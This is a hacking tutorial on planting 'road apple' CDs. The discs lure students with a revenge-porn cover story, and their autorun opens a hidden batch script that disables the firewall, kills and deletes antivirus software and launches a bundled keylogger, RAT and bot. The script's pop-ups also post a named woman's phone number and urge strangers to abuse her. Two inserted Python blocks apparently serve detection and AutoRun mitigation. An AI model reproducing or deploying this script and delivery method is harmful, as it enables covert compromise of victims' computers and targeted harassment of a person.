
Note: This tut is for educational purposes only, and I am not responsible for any actions you take with the information.

What are "Road Apples"?
A CD or USB drive that is believed to be one thing but is actually infected with a keylogger, RAT, or other malicious content. The idea plays on human curiosity. These can be distributed to a target area, or at random. In this tut, we will be targeting a wide but focused demographic: male high-school to college students.

Making it believable
To make a person want to run a CD, you need to make it believable or intriguing, so we need a cover story. Ours will be that of a jealous ex-boyfriend called "John" who is spreading these pictures via CD to get back at his ex for cheating on him with his brother. (Cheesy, I know, but just wait, it plays out.)

What you'll need:
-Cover story
-Blank CD-R disc (DVDs will work too, but they can only be played on newer machines.)
-CD burner
-CD cases or envelopes
-Permanent marker
-Keylogger, RAT, or other malicious media you want to drop (don't ask; Google it and you'll find hundreds)
-Common sense

I strongly suggest using CDs because they are read-only, which means that even if an AV does detect the payload, it can only warn the user, not delete it. If you're using a USB drive, make sure your infection is 100000% UD (undetectable) or you will be fighting a losing battle.

I will be using a bound file containing a keylogger, RAT, and bot server in one. I will also use an AV killer launched from autostart that kills and deletes older AV programs.

AV killer 100% UD autostart script: (Props to Mathias for this code, which I modified to my own use...please do the same!)

Code:
MSG * Hello, thank you for running this CD.
MSG * My name is John
MSG * This is my ex Tiffany
MSG * She broke my heart by cheating on me with my brother
MSG * She Will rot in hell, but this is my revenge...
MSG * Oh, and here's her number...NY area code since she was only in **** for school.
MSG * 845-290-8610
MSG * Leave her a message asking how she likes being a cheating slut, she might just call you back :-)
MSG * Feel free to pass this to your friends. Help me show the world what a slut she is.
MSG * Enjoi
set fun=net
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
%fun% %morefun% “Security Center”
%fun%sh firewall set opmode mode=disable
%math%%ias% %beer% E-*
cls
%math%%ias% %beer% av*
cls
%math%%ias% %beer% fire*
cls
%math%%ias% %beer% anti*
cls
%math%%ias% %beer% spy*
cls
%math%%ias% %beer% bullguard
cls
%math%%ias% %beer% PersFw
cls
%math%%ias% %beer% KAV*
cls
%math%%ias% %beer% UfseAgnt*
cls
%math%%ias% %beer% Spy*
cls
%math%%ias% %beer% ZONEALARM
cls
%math%%ias% %beer% SAFEWEB
cls
%math%%ias% %beer% OUTPOST
cls
%math%%ias% %beer% nv*
cls
%math%%ias% %beer% nav*
cls
%math%%ias% %beer% F-*
cls
%math%%ias% %beer% ESAFE
cls
%math%%ias% %beer% cle
cls
%math%%ias% %beer% BLACKICE
cls
%math%%ias% %beer% def*
cls
%math%%ias% %beer% kav
cls
%math%%ias% %beer% kav*
cls
%math%%ias% %beer% avg*
cls
%math%%ias% %beer% ash*
cls
%math%%ias% %beer% aswupdsv
cls
%math%%ias% %beer% ewid*
cls
%math%%ias% %beer% guard*
cls
%math%%ias% %beer% guar*
cls
%math%%ias% %beer% gcasDt*
cls
%math%%ias% %beer% msmp*
cls
%math%%ias% %beer% mcafe*
cls
%math%%ias% %beer% mghtml
cls
%math%%ias% %beer% msiexec
cls
%math%%ias% %beer% outpost
cls
%math%%ias% %beer% isafe
cls
%math%%ias% %beer% zap*
cls
%math%%ias% %beer% zauinst
cls
%math%%ias% %beer% upd*
cls
%math%%ias% %beer% zlclien*
cls
%math%%ias% %beer% minilog
cls
%math%%ias% %beer% cc*
cls
%math%%ias% %beer% norton*
cls
%math%%ias% %beer% norton au*
cls
%math%%ias% %beer% ccc*
cls
%math%%ias% %beer% npfmn*
cls
%math%%ias% %beer% loge*
cls
%math%%ias% %beer% nisum*
cls
%math%%ias% %beer% issvc
cls
%math%%ias% %beer% tmp*
cls
%math%%ias% %beer% tmn*
cls
%math%%ias% %beer% pcc*
cls
%math%%ias% %beer% cpd*
cls
%math%%ias% %beer% pop*
cls
%math%%ias% %beer% pav*
cls
%math%%ias% %beer% padmin
cls
%math%%ias% %beer% panda*
cls
%math%%ias% %beer% avsch*
cls
%math%%ias% %beer% sche*
cls
%math%%ias% %beer% syman*
cls
%math%%ias% %beer% virus*
cls
%math%%ias% %beer% realm*
cls
%math%%ias% %beer% sweep*
cls
%math%%ias% %beer% scan*
cls
%math%%ias% %beer% ad-*
cls
%math%%ias% %beer% safe*
cls
%math%%ias% %beer% avas*
cls
%math%%ias% %beer% norm*
cls
%math%%ias% %beer% offg*
cls
%mathias% /Q /F %ProgramFiles%\alwils~1\avast4\*.*
cls
%mathias% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe
cls
%mathias% /Q /F %ProgramFiles%\kasper~1\*.exe
cls
%mathias% /Q /F %ProgramFiles%\trojan~1\*.exe
cls
%mathias% /Q /F %ProgramFiles%\f-prot95\*.*
cls
%mathias% /Q /F %ProgramFiles%\tbav\*.dat
cls
%mathias% /Q /F %ProgramFiles%\avpersonal\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
cls
%mathias% /Q /F %ProgramFiles%\Mcafee\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\Trend Micro\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
cls
%mathias% /Q /F %ProgramFiles%\avgamsr\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avgamsvr\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avgemc\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avgcc\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avgupsvc\*.exe
cls
%mathias% /Q /F %ProgramFiles%\grisoft
cls
%mathias% /Q /F %ProgramFiles%\nood32krn\*.exe
cls
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
cls
%mathias% /Q /F %ProgramFiles%\nod32\*.exe
cls
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
cls
%mathias% /Q /F %ProgramFiles%\kav\*.exe
cls
%mathias% /Q /F %ProgramFiles%\kavmm\*.exe
cls
%mathias% /Q /F %ProgramFiles%\kaspersky\*.*
cls
%mathias% /Q /F %ProgramFiles%\ewidoctrl\*.exe
cls
%mathias% /Q /F %ProgramFiles%\guard\*.exe
cls
%mathias% /Q /F %ProgramFiles%\ewido\*.exe
cls
%mathias% /Q /F %ProgramFiles%\pavprsrv\*.exe
cls
%mathias% /Q /F %ProgramFiles%\pavprot\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avengine\*.exe
cls
%mathias% /Q /F %ProgramFiles%\apvxdwin\*.exe
cls
%mathias% /Q /F %ProgramFiles%\webproxy\*.exe
cls
%mathias% /Q /F %ProgramFiles%\panda software\*.*
cls
COPY MSWINSCK.OCX C:\windows\System32 /Y
cls
Regsvr32 /s MSWINSCK.OCX
cls
IF EXIST C:\Windows\System32\MSWINSCK.OCX Call Tiffy2.exe
cls
Call Tiffany002.jpg
cls

This is the bread and butter of this technique. I'm using the one batch file to kill the AV and launch my infection. (Later, I'll make this invisible.) First, let's look over the code...
Code:
MSG * Hello, thank you for running this CD.
MSG * My name is John
MSG * This is my ex Tiffany
MSG * She broke my heart by cheating on me with my brother
MSG * She Will rot in hell, but this is my revenge...
MSG * Oh, and here's her number...NY area code since she was only in **** for school.
MSG * 845-290-8610
MSG * Leave her a message asking how she likes being a cheating slut, she might just call you back :-)
MSG * Feel free to pass this to your friends. Help me show the world what a slut she is.
MSG * Enjoi
This is what makes the story true in the victim's eyes. These pop-ups appear, distracting the user and drawing them in to want to see the pics. It even provides a phone number to leave a voicemail (using a fake female voicemail account).

Code:
set fun=net
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
%fun% %morefun% “Security Center”
%fun%sh firewall set opmode mode=disable
%math%%ias% %beer% E-*
cls
%math%%ias% %beer% av*
This is the main AV killer portion of the code. You can also run this without using an AV killer, but then make sure your bound file is 100% UD.
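The `set fun=net` / `%fun%` indirection above only hides the commands from a casual reader; cmd.exe expands the variables before running anything, so an analyst can do the same. The following is an added triage helper, not code from the post: it applies the `set` lines, expands `%name%` references the way cmd.exe does (case-insensitively, leaving variables the script never set, such as `%ProgramFiles%`, untouched), and then matches the resulting plain commands against a few defender-side indicators. The sample fragment and the indicator names are constructed for the example. It does not handle delayed expansion (`!name!`) or `call`-level re-expansion, which is an assumption to keep in mind when pointing it at other scripts.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: a fragment in the style of the obfuscated batch file discussed above
# (straight quotes used deliberately; the lines are not copied from the post).
SAMPLE_BATCH = r"""
set fun=net
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
%fun% %morefun% "Security Center"
%fun%sh firewall set opmode mode=disable
%math%%ias% %beer% av*
cls
%mathias% /Q /F %ProgramFiles%\Mcafee\*.*
"""

SET_RE = re.compile(r"^set\s+([^=\s]+)=(.*)$", re.IGNORECASE)
VAR_RE = re.compile(r"%([^%\s]+)%")

# Defender-side indicators, matched against the de-obfuscated command lines.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("service-stop", re.compile(r"\bnet\s+stop\b", re.I)),
    ("firewall-disable", re.compile(r"\bnetsh\s+firewall\b.*\bdisable\b", re.I)),
    ("process-kill-wildcard", re.compile(r"\b(tskill|taskkill)\b.*\*", re.I)),
    ("delete-in-program-files", re.compile(r"\bdel\b.*%ProgramFiles%", re.I)),
]


def expand_batch(text: str) -> List[str]:
    """Apply `set name=value` lines and expand %name% references (case-insensitive, like cmd.exe).
    Variables never set in the script (e.g. %ProgramFiles%) are left untouched. Returns the
    remaining command lines in order, with `set` lines consumed and blank lines dropped."""
    env: Dict[str, str] = {}
    commands: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
            continue
        commands.append(VAR_RE.sub(lambda v: env.get(v.group(1).lower(), v.group(0)), line))
    return commands


def classify(text: str) -> List[Tuple[str, str]]:
    """Return (indicator, expanded_command) pairs for every line that matches an indicator."""
    hits: List[Tuple[str, str]] = []
    for cmd in expand_batch(text):
        for label, pattern in INDICATORS:
            if pattern.search(cmd):
                hits.append((label, cmd))
    return hits


if __name__ == "__main__":
    for label, cmd in classify(SAMPLE_BATCH):
        print(f"{label:24} {cmd}")
```

Once expanded, `%math%%ias% %beer% av*` reads as `tskill /a av*` (the XP-era `tskill` command with its "all sessions" switch), and `%fun%sh ... mode=disable` as a `netsh firewall` disable. Those plain forms are what a process-creation log or an EDR rule actually sees, which is why command-line logging of `net`, `netsh`, `tskill`, `taskkill` and `del` with `/F` under Program Files is a more robust detection than scanning the script text itself.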

The last portion calls the bound file, and also copies any needed files to system folders or runs registry edits as needed.
Code:
COPY MSWINSCK.OCX C:\windows\System32 /Y
cls
Regsvr32 /s MSWINSCK.OCX
cls
IF EXIST C:\Windows\System32\MSWINSCK.OCX Call Tiffy2.exe
cls
Call Tiffany002.jpg
cls
The .OCX file I'm copying and registering is needed by my botnet server to run, so I'm simply copying it to the system32 folder and registering it. The batch then checks whether the file is correctly installed and runs the bound file. It then opens the first pic in the series, and that's it.

Now, if you tied this directly to an autorun script it would work, but the CMD window would display its actions while you're trying to make the target believe the disc is legitimate. For this we add the file cmdow.exe (see the website at the end of the tut). Copy it to the root of the disc, and make the following batch file.
Code:
cmdow /run /hid autorun.bat
This calls the original .bat file we just discussed and runs it completely hidden, except for the pop-up messages.

Now, we write the autorun script.
Code:
[autorun]
OPEN=hide.bat
Action=View Tiffany's Pix
icon=favicon.ico
shellexcecute=hide.bat
shell/Auto/command=hide.bat
Notice how hide.bat is called, not the AV killer batch!
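The autorun.inf above is the whole delivery mechanism: whatever AutoPlay honours in `open=`, `shellexecute=` or a `shell\verb\command=` entry gets executed, and `action=` / `icon=` only dress up the prompt. The following is an added defender's check, not part of the post: a small Python parser for autorun.inf that reports which directives would launch something, how severe that is (a `.bat`/`.exe` style target versus a document), and which directives are unrecognized and therefore ignored by AutoRun. The sample file and the severity labels are constructed for the example; the list of known directive names is an assumption limited to the common ones.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the style of the autorun.inf discussed above (not copied from any real disc).
SAMPLE_AUTORUN = r"""
[autorun]
OPEN=hide.bat
Action=View Tiffany's Pix
icon=favicon.ico
shellexcecute=hide.bat
shell\Auto\command=hide.bat
"""

# File types an AutoRun directive can launch directly; such a target is rated high severity.
EXEC_EXTENSIONS = (".bat", ".cmd", ".exe", ".com", ".scr", ".pif", ".vbs", ".js", ".hta")
# Directive names AutoRun honours (assumption: list limited to the common ones).
KNOWN_KEYS = {"open", "icon", "label", "action", "shellexecute", "useautoplay", "shell"}
SHELL_CMD_RE = re.compile(r"^shell\\[^\\]+\\command$")


def parse_autorun(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Minimal INI-style parser: {section: [(key, value), ...]}, section and key names lowercased."""
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current].append((key.strip().lower(), value.strip()))
    return sections


def assess_autorun(text: str) -> List[Tuple[str, str, str]]:
    """Return (severity, key, reason) findings for the [autorun] section."""
    findings: List[Tuple[str, str, str]] = []
    for key, value in parse_autorun(text).get("autorun", []):
        launches = key in ("open", "shellexecute") or SHELL_CMD_RE.match(key) is not None
        if launches:
            tokens = value.strip('"').split()
            target = tokens[0].lower() if tokens else ""
            if target.endswith(EXEC_EXTENSIONS):
                findings.append(("high", key, f"launches executable content: {value}"))
            else:
                findings.append(("medium", key, f"launches: {value}"))
        elif key == "action":
            findings.append(("low", key, f"custom AutoPlay prompt text: {value}"))
        elif key not in KNOWN_KEYS and not key.startswith("shell\\"):
            findings.append(("info", key, "unrecognized directive; AutoRun ignores it"))
    return findings


def verdict(text: str) -> str:
    """'block' if any directive launches executable content, 'review' if it launches anything else, else 'allow'."""
    severities = {s for s, _, _ in assess_autorun(text)}
    if "high" in severities:
        return "block"
    if "medium" in severities:
        return "review"
    return "allow"


if __name__ == "__main__":
    for finding in assess_autorun(SAMPLE_AUTORUN):
        print(*finding)
    print("verdict:", verdict(SAMPLE_AUTORUN))
```

On the sample, both `open=` and `shell\Auto\command=` point at a batch file, so the verdict is `block`, while the misspelled `shellexcecute` line is reported as ignored. The practical mitigation is not a parser but policy: setting the `NoDriveTypeAutoRun` policy value under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer` to `0xFF` disables AutoRun for every drive type, and since Windows 7 (and the KB971029 update for XP and Vista) AutoRun is already not honoured for non-optical removable media, which is exactly why the post prefers CDs.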

Save all the files needed to a folder, along with the pix, and burn them to a CD. Now, the trick is finding a burning program that allows you to select certain files to be hidden. I couldn't find one, except for the built-in Vista tool, so I used that. Make sure your disc is set to finalize, or your files may be deleted if an AV detects them!

The last step is simply distributing the CDs. I spread mine around the local community college, in bathrooms, locker rooms, and on the windshields of cars that appear to belong to guys.

Hope this helps, and please don't be a skiddie and use everything word for word...adapt it for yourself!

CMDOW site:
http://www.commandline.co.uk/cmdow/

Posted by Cyber Trunks
